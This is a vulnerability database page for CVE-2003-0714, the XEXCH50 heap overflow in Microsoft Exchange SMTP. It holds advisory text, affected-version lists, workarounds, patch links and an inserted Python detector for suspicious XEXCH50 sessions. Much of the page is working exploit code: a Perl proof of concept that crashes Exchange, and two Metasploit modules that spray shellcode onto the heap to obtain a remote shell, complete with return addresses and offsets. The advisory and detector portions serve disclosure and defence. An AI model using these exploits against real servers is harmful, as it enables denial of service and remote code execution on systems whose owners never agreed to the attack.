CVE-2003-0714
CVSS 7.5
Published: 2003-11-17 00:00:00
Revised: 2016-10-17 22:36:47

[Original] The Internet Mail Service in Exchange Server 5.5 and Exchange 2000 allows remote attackers to cause a denial of service (memory exhaustion) by directly connecting to the SMTP service and sending a certain extended verb request, possibly triggering a buffer overflow in Exchange 2000.


[CNNVD] Windows Exchange Server Remote Buffer Overflow Vulnerability (CNNVD-200311-037)

Microsoft Exchange Server is a mail server product developed by Microsoft.
Exchange Server 2.5 and 2000 do not adequately handle malicious verb requests; a remote attacker can exploit this to execute arbitrary instructions on the system with the privileges of the Exchange Server process.
In Exchange Server 5.5, the Internet Mail Service has a security issue that allows an unauthenticated user to connect to the Exchange Server SMTP port and send a specially crafted extended verb request, causing an oversized memory allocation; this can shut down the Internet Mail Service or make it stop responding.
Exchange 2000 Server has the same issue, and such a request can cause a denial of service similar to that in Exchange Server 5.5. In addition, if the attacker carefully crafts the submitted data, it may be possible to execute arbitrary instructions on the system with the privileges of the Exchange Server process.

- CVSS (base score)

CVSS score: 7.5 [HIGH]
Confidentiality impact: [--]
Integrity impact: [--]
Availability impact: [--]
Attack complexity: [--]
Attack vector: [--]
Authentication: [--]

- CPE (affected platforms and products)

cpe:/a:microsoft:exchange_server:2000  Microsoft exchange_srv 2000
cpe:/a:microsoft:exchange_server:2000:sp3  Microsoft Exchange Server 2000 Service Pack 3
cpe:/a:microsoft:exchange_server:2000:sp1  Microsoft Exchange Server 2000 Service Pack 1
cpe:/a:microsoft:exchange_server:2000:sp2  Microsoft Exchange Server 2000 Service Pack 2
cpe:/a:microsoft:exchange_server:5.5  Microsoft exchange_srv 5.5
cpe:/a:microsoft:exchange_server:5.5:sp2  Microsoft Exchange Server 5.5 Service Pack 2
cpe:/a:microsoft:exchange_server:5.5:sp3  Microsoft Exchange Server 5.5 Service Pack 3
cpe:/a:microsoft:exchange_server:5.5:sp1  Microsoft Exchange Server 5.5 Service Pack 1
cpe:/a:microsoft:exchange_server:5.5:sp4  Microsoft Exchange Server 5.5 Service Pack 4

- OVAL (technical details for detection)

No related OVAL definitions found

- Official database links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0714
(official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2003-0714
(official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200311-037
(official data source) CNNVD

- Other links and resources

http://marc.info/?l=bugtraq&m=106682909006586&w=2
(UNKNOWN)  BUGTRAQ  20031022 MS03-046 Microsoft Exchange 2000 Heap Overflow
http://www.cert.org/advisories/CA-2003-27.html
(UNKNOWN)  CERT  CA-2003-27
http://www.kb.cert.org/vuls/id/422156
(VENDOR_ADVISORY)  CERT-VN  VU#422156
http://www.microsoft.com/technet/security/bulletin/ms03-046.asp
(VENDOR_ADVISORY)  MS  MS03-046
http://www.securityfocus.com/bid/8838
(VENDOR_ADVISORY)  BID  8838

- Vulnerability information

Windows Exchange Server Remote Buffer Overflow Vulnerability
High  Boundary condition error
2003-11-17 00:00:00 2005-10-20 00:00:00
Remote

- Advisories and patches

Temporary workarounds:
If you cannot install the patch or upgrade immediately, CNNVD recommends the following measures to reduce the risk:
* Use SMTP protocol inspection to filter SMTP protocol extensions:
The default ISA rule for Exchange can filter SMTP protocol extensions; for details see:

http://support.microsoft.com/default.aspx?scid=kb;en-us;311237.

* Use a firewall to restrict SMTP access.
* Accept only authenticated SMTP sessions, using the SMTP AUTH command to restrict the server to authenticated sessions.
Vendor patch:
Microsoft
---------
Microsoft has released a security bulletin (MS03-046) and the corresponding patch:
MS03-046: Vulnerability in Exchange Server Could Allow Arbitrary Code Execution (829436)
Link:
http://www.microsoft.com/technet/security/bulletin/MS03-046.asp

Patch download:
Microsoft Exchange Server 5.5, Service Pack 4

http://www.microsoft.com/downloads/details.aspx?FamilyId=A9E872EA-54B0-4179-8AE9-5648BFB46459&displaylang=en

Microsoft Exchange 2000 Server, Service Pack 3

http://www.microsoft.com/downloads/details.aspx?FamilyId=7BAF5394-1B4E-4937-A570-9F232AE49F01&displaylang=en
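The workarounds above reduce to one rule: XEXCH50 must never be accepted from an unauthenticated SMTP client. As an added, defender-side example that is not part of this record or of the exploits below, the function here walks an SMTP session transcript and flags XEXCH50 issued before a successful AUTH (235 reply), a negative or oversized size argument, and a 354 reply to such a request, which is the same signal the PoC's CHECK mode uses to tell a patched server from an unpatched one. The "C:"/"S:" transcript format, the sample session and the 1 MiB size threshold are assumptions.

```python
"""Flag risky XEXCH50 use in an SMTP session transcript (added example, not from this record)."""
import re
from dataclasses import dataclass
from typing import List, Optional, Tuple

# Constructed sample transcript: "C:" marks client lines, "S:" server lines.
# Host name, addresses and replies are made up; the 354 reply text mirrors
# the string the PoC in this record looks for.
SAMPLE_SESSION = """\
S: 220 mail.example.local Microsoft ESMTP MAIL Service ready
C: EHLO X
S: 250-mail.example.local Hello
S: 250-XEXCH50
S: 250 OK
C: MAIL FROM: DoS
S: 250 2.1.0 DoS....Sender OK
C: RCPT TO: Administrator
S: 250 2.1.5 Administrator
C: XEXCH50 2 2
S: 354 Send binary data
C: XEXCH50 -1 2
S: 354 Send binary data
"""

# Assumption: no legitimate server-to-server transfer announces more than 1 MiB.
MAX_SANE_SIZE = 1024 * 1024

XEXCH50_RE = re.compile(r"^XEXCH50\s+(-?\d+)\s+(-?\d+)\s*$", re.IGNORECASE)


@dataclass
class Finding:
    line_no: int   # 1-based line in the transcript
    reason: str
    command: str   # the client command that caused the finding


def analyze_session(transcript: str) -> List[Finding]:
    """Return findings for unauthenticated, negative or oversized XEXCH50 use."""
    findings: List[Finding] = []
    authenticated = False                      # set once the server replies 235 to AUTH
    pending: Optional[Tuple[int, str]] = None  # last XEXCH50 still waiting for a reply
    for line_no, raw in enumerate(transcript.splitlines(), start=1):
        who, sep, text = raw.partition(":")
        if not sep:
            continue
        who, text = who.strip().upper(), text.strip()
        if who == "S":
            code = text[:3]
            if code == "235":
                authenticated = True
            # A 354 to an unauthenticated XEXCH50 is what the PoC's CHECK mode
            # treats as "unpatched": fixed servers require NTLM auth first.
            if pending and code == "354" and not authenticated:
                findings.append(Finding(line_no, "unauthenticated XEXCH50 accepted (354): server looks unpatched", pending[1]))
            pending = None
            continue
        if who != "C":
            continue
        m = XEXCH50_RE.match(text)
        if not m:
            continue
        size = int(m.group(1))
        if not authenticated:
            findings.append(Finding(line_no, "XEXCH50 issued before AUTH", text))
        if size < 0 or size > MAX_SANE_SIZE:
            findings.append(Finding(line_no, f"suspicious size argument {size}", text))
        pending = (line_no, text)
    return findings


if __name__ == "__main__":
    for f in analyze_session(SAMPLE_SESSION):
        print(f"line {f.line_no}: {f.reason} [{f.command}]")
```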

- Vulnerability information (113)

MS Exchange 2000 XEXCH50 Heap Overflow PoC (MS03-046) (EDBID:113)
windows dos
2003-10-22 Verified
0 H D Moore
N/A
#!/usr/bin/perl -w
##################

##
# ms03-046.pl - hdm metasploit com
# This vulnerability allows a remote unauthenticated user to overwrite big chunks 
# of the heap used by the inetinfo.exe process. Reliably exploiting this bug is 
# non-trivial; even though the entire buffer is binary safe (even nulls) and can be 
# just about any size, the actual code that crashes varies widely with each request. 
# During the analysis process, numerous combinations of request size, concurrent 
# requests, pre-allocations, and alternate trigger routes were examined and not a 
# single duplicate of location and data offset was discovered. Hopefully the magic 
# combination of data, size, and setup will be found to allow this bug to be reliably 
# exploited.

# minor bugfix: look for 354 Send binary data

use strict;
use IO::Socket;

my $host = shift() || usage();
my $mode = shift() || "CHECK";
my $port = 25;


if (uc($mode) eq "CHECK") { check() }
if (uc($mode) eq "CRASH") { crash() }

usage();


sub check
{
    my $s = SMTP($host, $port);
    if (! $s)
    {
        print "[*] Error establishing connection to SMTP service.\n";
        exit(0);
    }

    print $s "XEXCH50 2 2\r\n";
    my $res = <$s>;    
    close ($s);

    # a patched server only allows XEXCH50 after NTLM authentication
    if ($res !~ /354 Send binary/i)
    {
        print "[*] This server has been patched or is not vulnerable.\n";
        exit(0);
    }

    print "[*] This system is vulnerable: $host:$port\n";

    exit(0);
}


sub crash
{
    my $s = SMTP($host, $port);
    if (! $s)
    {
        print "[*] Error establishing connection to SMTP service.\n";
        exit(0);
    }

    # the negative value allows us to overwrite random heap bits
    print $s "XEXCH50 -1 2\r\n";
    my $res = <$s>;    

    # a patched server only allows XEXCH50 after NTLM authentication
    if ($res !~ /354 Send binary/i)
    {
        print "[*] This server has been patched or is not vulnerable.\n";
        exit(0);
    }

    print "[*] Sending massive heap-smashing string...\n";
    print $s ("META" x 16384);

    # sometimes a second connection is required to trigger the crash
    $s = SMTP($host, $port);

    exit(0);
}


sub usage 
{
    print STDERR "Usage: $0 <host> [CHECK|CRASH]\n";
    exit(0);

}

sub SMTP
{
    my ($host, $port) = @_;
    my $s = IO::Socket::INET->new
    (
        PeerAddr => $host,
        PeerPort => $port,
        Proto    => "tcp"
    ) || return(undef);

    my $r = <$s>;
    return undef if !$r;
    
    if ($r !~ /Microsoft/)
    {
        chomp($r);
        print STDERR "[*] This does not look like an exchange server: $r\n";
        return(undef);
    }
    
    print $s "HELO X\r\n";
    $r = <$s>;
    return undef if !$r;   

    print $s "MAIL FROM: DoS\r\n";
    $r = <$s>;
    return undef if !$r;
    
    print $s "RCPT TO: Administrator\r\n";
    $r = <$s>;
    return undef if !$r;
    
    return($s); 
}


# milw0rm.com [2003-10-22]
		

- Vulnerability information (16820)

MS03-046 Exchange 2000 XEXCH50 Heap Overflow (EDBID:16820)
windows remote
2010-11-11 Verified
25 metasploit
N/A
##
# $Id: ms03_046_exchange2000_xexch50.rb 10998 2010-11-11 22:43:22Z jduck $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
	Rank = GoodRanking

	include Msf::Exploit::Remote::Tcp

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'MS03-046 Exchange 2000 XEXCH50 Heap Overflow',
			'Description'    => %q{
					This is an exploit for the Exchange 2000 heap overflow. Due
				to the nature of the vulnerability, this exploit is not very
				reliable. This module has been tested against Exchange 2000
				SP0 and SP3 running a Windows 2000 system patched to SP4. It
				normally takes between one and 100 connection attempts to
				successfully obtain a shell. This exploit is *very* unreliable.
			},
			'Author'         =>
				[
					'hdm', # original module
					'patrick', # msf3 port :)
				],
			'Version'        => '$Revision: 10998 $',
			'References'     =>
				[
					[ 'CVE', '2003-0714' ],
					[ 'BID', '8838' ],
					[ 'OSVDB', '2674' ],
					[ 'MSB', 'MS03-046' ],
					[ 'URL', 'http://www.milw0rm.com/exploits/113' ],
				],
			'DefaultOptions' =>
				{
					'EXITFUNC' => 'seh',
				},
			'Platform'       => 'win',
			'Privileged'     => true,
			'Payload'        =>
				{
					'Space'    => 1024,
					'BadChars' => "\x00\x0a\x0d\x20:=+\x22",
					'StackAdjustment' => -3500,
				},
			'Targets'        =>
				[
					[ 'Exchange 2000', { 'Ret' => 0x0c900c90, 'BuffLen' => 3000, 'Offset1' => 11000, 'Offset2' => 512 } ],
				],
			'DefaultTarget'  => 0,
			'DisclosureDate' => 'Oct 15 2003'))

		register_options(
			[
				Opt::RPORT(25),
				OptString.new('MAILFROM', [ true, 'The FROM address of the e-mail', 'random@example.com']),
				OptString.new('MAILTO', [ true, 'The TO address of the e-mail', 'administrator']),
				OptInt.new('ATTEMPTS', [ true, 'The number of exploit attempts before halting', 100]),
			])
	end

	def check
		connect
		banner = sock.get_once

		if (banner !~ /Microsoft/)
			print_status("Target does not appear to be an Exchange server.")
			return Exploit::CheckCode::Safe
		end

		sock.put("EHLO #{Rex::Text.rand_text_alpha(1)}\r\n")
		res = sock.get_once
		if (res !~ /XEXCH50/)
			print_status("Target does not appear to be an Exchange server.")
			return Exploit::CheckCode::Safe
		end
		sock.put("MAIL FROM: #{datastore['MAILFROM']}\r\n")
		res = sock.get_once

		if (res =~ /Sender OK/)
			sock.put("RCPT TO: #{datastore['MAILTO']}\r\n")
			res = sock.get_once
			if (res =~ /250/)
				sock.put("XEXCH50 2 2\r\n")
				res = sock.get_once
				if (res !~ /Send binary data/)
					print_error("Target has been patched!")
					return Exploit::CheckCode::Detected
				else
					return Exploit::CheckCode::Appears
				end
			end
		end

		disconnect
	end

	def smtp_setup(count)
		print_status("Exploit attempt ##{count}")

		connect
		select(nil,nil,nil,1)
		banner = sock.get_once
		print_status("Connected to SMTP server: #{banner.to_s}")

		if (banner !~ /Microsoft/)
			print_status("Target does not appear to be running Exchange.")
			return
		end

		select(nil,nil,nil,5)
		sock.put("EHLO X\r\n")
		select(nil,nil,nil,7)
		res = sock.get_once

		if (res !~ /XEXCH50/)
			print_status("Target is not running Exchange.")
			return
		end

		sock.put("MAIL FROM: #{datastore['MAILFROM']}\r\n")
		select(nil,nil,nil,3)

		sock.put("RCPT TO: #{datastore['MAILTO']}\r\n")
		select(nil,nil,nil,3)

	end

	def exploit
		bufflen = target['BuffLen']
		print_status("Trying to exploit #{target.name} with address 0x%.8x..." % target['Ret'])
		count = 1 # broke

		begin
			if (count > datastore['ATTEMPTS'])
				print_error("Exploit failed after #{datastore['ATTEMPTS']}. Set ATTEMPTS to a higher value if desired.")
				return # Stop after a specified number of attempts.
			end

			if (session_created?)
				return # Stop the attack. Non-session payloads will continue regardless up to ATTEMPTS.
			end

			while(true)
				if (smtp_setup(count))
					print_status("Connection 1: ")
				end

				sock.put("XEXCH50 2 2\r\n")
				select(nil,nil,nil,3)
				res = sock.get(-1,3)
				print_status("#{res}")
				if (res !~ /Send binary data/)
					print_status("Target is not vulnerable.")
					return # commented out for the moment
				end

				sock.put("XX")

				print_status("ALLOC")

				size = 1024 * 1024 * 32

				sock.put("XEXCH50 #{size} 2\r\n")
				select(nil,nil,nil,3)

				sploit = (([target['Ret']].pack('V')) * 256 * 1024 + payload.encoded + ("X" * 1024)) * 4 + "BEEF"

				print_status("Uploading shellcode to remote heap.")

				if (sock.put(sploit))
					print_status("\tOK.")
				end

				print_status("Connection 2: ")
				smtp_setup(count) # Connection 2

				sock.put("XEXCH50 -1 2\r\n") # Allocate negative value
				select(nil,nil,nil,2)
				res = sock.get_once

				if (!res)
					print_error("Error - no response")
				end

				print_status("OK")

				bufflen += target['Offset2']

				if (bufflen > target['Offset1'])
					bufflen = target['BuffLen']
				end

				heapover = [target['Ret']].pack('V') * bufflen
				print_status("Overwriting heap with payload jump (#{bufflen})")
				sock.put(heapover)

				print_status("Starting reconnect sequences...")

				10.times do |x|
					print_status("Connect #{x}")
					connect
					sock.put("HELO X\r\n")
					disconnect
				end
			end

		rescue
			print_status("Unable to connect or Exchange has crashed... Retrying.")
			count += 1
			retry
		end

		disconnect
	end
end
		

- Vulnerability information (F84536)

MS03-046 Exchange 2000 XEXCH50 Heap Overflow (PacketStormID:F84536)
2009-12-31 00:00:00
H D Moore,patrick  metasploit.com
exploit,overflow,shell
windows,2k
CVE-2003-0714

This is an exploit for the Exchange 2000 heap overflow. Due to the nature of the vulnerability, this exploit is not very reliable. This Metasploit module has been tested against Exchange 2000 SP0 and SP3 running a Windows 2000 system patched to SP4. It normally takes between one and 100 connection attempts to successfully obtain a shell. This exploit is *very* unreliable.

##
# $Id: ms03_046_exchange2000_xexch50.rb 7724 2009-12-06 05:50:37Z jduck $
##

##
# This file is part of the Metasploit Framework and may be subject to 
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/projects/Framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
	Rank = GoodRanking

	include Exploit::Remote::Tcp

	def initialize(info = {})
		super(update_info(info,	
			'Name'           => 'MS03-046 Exchange 2000 XEXCH50 Heap Overflow',
			'Description'    => %q{
				This is an exploit for the Exchange 2000 heap overflow. Due
				to the nature of the vulnerability, this exploit is not very
				reliable. This module has been tested against Exchange 2000
				SP0 and SP3 running a Windows 2000 system patched to SP4. It
				normally takes between one and 100 connection attempts to
				successfully obtain a shell. This exploit is *very* unreliable.
			},
			'Author'         => 	[
							'hdm', # original module
							'patrick', # msf3 port :)
						],
			'Version'        => '$Revision: 7724 $',
			'References'     =>
				[
					[ 'CVE', '2003-0714' ],
					[ 'BID', '8838' ],
					[ 'OSVDB', '2674' ],
					[ 'MSB', 'MS03-046' ],
					[ 'URL', 'http://www.milw0rm.com/exploits/113' ],
				],
			'DefaultOptions' =>
				{
					'EXITFUNC' => 'seh',
				},
			'Platform'       => 'win',
			'Privileged'     => true,
			'Payload'        =>
				{
					'Space'    => 1024,
					'BadChars' => "\x00\x0a\x0d\x20:=+\x22",
					'StackAdjustment' => -3500,
				},
			'Targets'        => 
				[
					[ 'Exchange 2000', { 'Ret' => 0x0c900c90, 'BuffLen' => 3000, 'Offset1' => 11000, 'Offset2' => 512 } ],
				],
			'DefaultTarget'  => 0,
			'DisclosureDate' => 'Oct 15 2003'))

			register_options(
			[
				Opt::RPORT(25),
				OptString.new('MAILFROM', [ true, 'The FROM address of the e-mail', 'random@example.com']),
				OptString.new('MAILTO', [ true, 'The TO address of the e-mail', 'administrator']),
				OptInt.new('ATTEMPTS', [ true, 'The number of exploit attempts before halting', 100]),
			])
	end
	
	def check
		connect
		banner = sock.get_once
		
		if (banner !~ /Microsoft/)
			print_status("Target does not appear to be an Exchange server.")
			return Exploit::CheckCode::Safe
		end

		sock.put("EHLO #{Rex::Text.rand_text_alpha(1)}\r\n")
		res = sock.get_once
		if (res !~ /XEXCH50/)
			print_status("Target does not appear to be an Exchange server.")
			return Exploit::CheckCode::Safe
		end
		sock.put("MAIL FROM: #{datastore['MAILFROM']}\r\n")
		res = sock.get_once
		
		if (res =~ /Sender OK/)
			sock.put("RCPT TO: #{datastore['MAILTO']}\r\n")
			res = sock.get_once
			if (res =~ /250/)
				sock.put("XEXCH50 2 2\r\n")
				res = sock.get_once
				if (res !~ /Send binary data/)
					print_error("Target has been patched!")
					return Exploit::CheckCode::Detected
				else
					return Exploit::CheckCode::Appears
				end
			end
		end
		
		disconnect
	end

	def smtp_setup(count)
		print_status("Exploit attempt ##{count}")

		connect
		sleep(1)
		banner = sock.get_once
		print_status("Connected to SMTP server: #{banner.to_s}")

		if (banner !~ /Microsoft/)
			print_status("Target does not appear to be running Exchange.")
			return
		end

		sleep(5)
		sock.put("EHLO X\r\n")
		sleep(7)
		res = sock.get_once

		if (res !~ /XEXCH50/)
			print_status("Target is not running Exchange.")
			return
		end

		sock.put("MAIL FROM: #{datastore['MAILFROM']}\r\n")
		sleep(3)

		sock.put("RCPT TO: #{datastore['MAILTO']}\r\n")
		sleep(3)

	end

	def exploit
		bufflen = target['BuffLen']
		print_status("Trying to exploit #{target.name} with address 0x%.8x..." % target['Ret'])
		count = 1 # broke

		begin
			if (count > datastore['ATTEMPTS'])
				print_error("Exploit failed after #{datastore['ATTEMPTS']}. Set ATTEMPTS to a higher value if desired.") 
				return # Stop after a specified number of attempts.
			end

			if (session_created?)
				return # Stop the attack. Non-session payloads will continue regardless up to ATTEMPTS.
			end

			while(true)
				if (smtp_setup(count))
					print_status("Connection 1: ")
				end

				sock.put("XEXCH50 2 2\r\n")
				sleep(3)
				res = sock.get(-1,3)
				print_status("#{res}")
				if (res !~ /Send binary data/)
					print_status("Target is not vulnerable.")
					return # commented out for the moment
				end

				sock.put("XX")

				print_status("ALLOC")

				size = 1024 * 1024 * 32

				sock.put("XEXCH50 #{size} 2\r\n")
				sleep(3)

				sploit = (([target['Ret']].pack('V')) * 256 * 1024 + payload.encoded + ("X" * 1024)) * 4 + "BEEF"

				print_status("Uploading shellcode to remote heap.")

				if (sock.put(sploit))
					print_status("\tOK.")
				end

				print_status("Connection 2: ")
				smtp_setup(count) # Connection 2

				sock.put("XEXCH50 -1 2\r\n") # Allocate negative value
				sleep(2)
				res = sock.get_once

				if (!res)
					print_status("Error - no response")
				end

				print_status("OK")

				bufflen += target['Offset2']

				if (bufflen > target['Offset1'])
					bufflen = target['BuffLen']
				end

				heapover = [target['Ret']].pack('V') * bufflen
				print_status("Overwriting heap with payload jump (#{bufflen})")
				sock.put(heapover)

				print_status("Starting reconnect sequences...")

				10.times do |x|
					print_status("Connect #{x}")
					connect
					sock.put("HELO X\r\n")
					disconnect
				end
			end

		rescue 
			print_status("Unable to connect or Exchange has crashed... Retrying.")
			count += 1
			retry
		end

		disconnect
	end
end
    

- Vulnerability information

2674
Microsoft Exchange SMTP Extended Request Overflow
Remote / Network Access Input Manipulation
Loss of Integrity
Exploit Public, Exploit Commercial

- Vulnerability description

Microsoft Exchange contains a flaw that may allow a remote attacker to execute arbitrary code or cause a denial of service. The flaw is due to the SMTP server's improper handling of XEXCH50 verb requests. If an un-authenticated attacker issues a specially-crafted extended verb request, it may exhaust the available memory of the server or in some cases, allow the execution of arbitrary code.

- Timeline

2003-10-15 Unknown
Unknown Unknown

- Solution

Currently, there are no known workarounds or upgrades to correct this issue. However, Microsoft has released a patch to address this vulnerability.

- Related references

- Vulnerability author

- Vulnerability information

Microsoft Exchange Server Buffer Overflow Vulnerability
Boundary Condition Error 8838
Remote: Yes  Local: No
2003-10-15 12:00:00 2009-07-11 11:56:00
Credited to João Gouveia.

- Affected program versions

Microsoft Exchange Server 2000 SP3
Microsoft Exchange Server 2000 SP2
- Microsoft Windows 2000 Advanced Server SP2
- Microsoft Windows 2000 Advanced Server SP1
- Microsoft Windows 2000 Advanced Server
- Microsoft Windows 2000 Datacenter Server SP2
- Microsoft Windows 2000 Datacenter Server SP1
- Microsoft Windows 2000 Datacenter Server
- Microsoft Windows 2000 Server SP2
- Microsoft Windows 2000 Server SP1
- Microsoft Windows 2000 Server
Microsoft Exchange Server 2000 SP1
- Microsoft Windows 2000 Advanced Server SP2
- Microsoft Windows 2000 Advanced Server SP1
- Microsoft Windows 2000 Advanced Server
- Microsoft Windows 2000 Datacenter Server SP2
- Microsoft Windows 2000 Datacenter Server SP1
- Microsoft Windows 2000 Datacenter Server
- Microsoft Windows 2000 Server SP2
- Microsoft Windows 2000 Server SP1
- Microsoft Windows 2000 Server
Microsoft Exchange Server 2000
- Microsoft Windows 2000 Advanced Server SP2
- Microsoft Windows 2000 Advanced Server SP1
- Microsoft Windows 2000 Advanced Server
- Microsoft Windows 2000 Datacenter Server SP2
- Microsoft Windows 2000 Datacenter Server SP1
- Microsoft Windows 2000 Datacenter Server
- Microsoft Windows 2000 Server SP2
- Microsoft Windows 2000 Server SP1
- Microsoft Windows 2000 Server
Microsoft Exchange Server 5.5 SP4
- Microsoft BackOffice 4.5
- Microsoft Windows 2000 Professional SP2
- Microsoft Windows 2000 Professional SP1
- Microsoft Windows 2000 Professional
- Microsoft Windows NT 4.0 SP6a
- Microsoft Windows NT 4.0 SP6
- Microsoft Windows NT 4.0 SP5
- Microsoft Windows NT 4.0 SP4
- Microsoft Windows NT 4.0 SP3
- Microsoft Windows NT 4.0 SP2
- Microsoft Windows NT 4.0 SP1
- Microsoft Windows NT 4.0
Microsoft Exchange Server 5.5 SP3
- Microsoft BackOffice 4.5
- Microsoft Windows 2000 Professional SP2
- Microsoft Windows 2000 Professional SP1
- Microsoft Windows 2000 Professional
- Microsoft Windows NT 4.0 SP6a
- Microsoft Windows NT 4.0 SP6
- Microsoft Windows NT 4.0 SP5
- Microsoft Windows NT 4.0 SP4
- Microsoft Windows NT 4.0 SP3
- Microsoft Windows NT 4.0 SP2
- Microsoft Windows NT 4.0 SP1
- Microsoft Windows NT 4.0
Microsoft Exchange Server 5.5 SP2
- Microsoft BackOffice 4.5
- Microsoft Windows 2000 Professional SP2
- Microsoft Windows 2000 Professional SP1
- Microsoft Windows 2000 Professional
- Microsoft Windows NT 4.0 SP6a
- Microsoft Windows NT 4.0 SP6
- Microsoft Windows NT 4.0 SP5
- Microsoft Windows NT 4.0 SP4
- Microsoft Windows NT 4.0 SP3
- Microsoft Windows NT 4.0 SP2
- Microsoft Windows NT 4.0 SP1
- Microsoft Windows NT 4.0
Microsoft Exchange Server 5.5 SP1
- Microsoft BackOffice 4.5
- Microsoft Windows 2000 Professional SP2
- Microsoft Windows 2000 Professional SP1
- Microsoft Windows 2000 Professional
- Microsoft Windows NT 4.0 SP6a
- Microsoft Windows NT 4.0 SP6
- Microsoft Windows NT 4.0 SP5
- Microsoft Windows NT 4.0 SP4
- Microsoft Windows NT 4.0 SP3
- Microsoft Windows NT 4.0 SP2
- Microsoft Windows NT 4.0 SP1
- Microsoft Windows NT 4.0
Microsoft Exchange Server 5.5
- Microsoft BackOffice 4.5
- Microsoft Windows 2000 Professional SP2
- Microsoft Windows 2000 Professional SP1
- Microsoft Windows 2000 Professional
- Microsoft Windows NT 4.0 SP6a
- Microsoft Windows NT 4.0 SP6
- Microsoft Windows NT 4.0 SP5
- Microsoft Windows NT 4.0 SP4
- Microsoft Windows NT 4.0 SP3
- Microsoft Windows NT 4.0 SP2
- Microsoft Windows NT 4.0 SP1
- Microsoft Windows NT 4.0
Microsoft Exchange Server 5.0 SP2
- Microsoft Windows NT 4.0
Microsoft Exchange Server 5.0 SP1
- Microsoft Windows NT 4.0
Microsoft Exchange Server 5.0
- Microsoft Windows NT 4.0

- Vulnerability discussion

Microsoft has announced that Exchange Server is affected by a remotely exploitable buffer overflow condition. The overflow can be triggered remotely by unauthenticated SMTP clients. The source of the issue appears to be in how the XEXCH50 verb is handled by the server. Microsoft has stated that remote code execution is possible on hosts running Exchange 2000 Server. Servers running Exchange Server 5.0 and 5.5 are vulnerable to a denial of service attack.

- Exploitation

CORE has developed a working commercial exploit for their IMPACT product. This exploit is not otherwise publicly available or known to be circulating in the wild.

A denial of service proof-of-concept has been made available:

- Solution

Patches are available.

Microsoft has released an update to their advisory MS03-046 covering Exchange Server and the related fixes. Please see the referenced advisory for more information and details on obtaining fixes.


Microsoft Exchange Server 5.0 SP2

Microsoft Exchange Server 2000 SP3

Microsoft Exchange Server 5.5 SP4

- Related references

About the SCAP Chinese Community

The SCAP Chinese Community is the first Chinese-language open community in China devoted to SCAP. For more information, see [About this site]

Copyright notice

CVE/CWE/OVAL are registered trademarks of the MITRE Corporation; their official data sources are kept on MITRE's related websites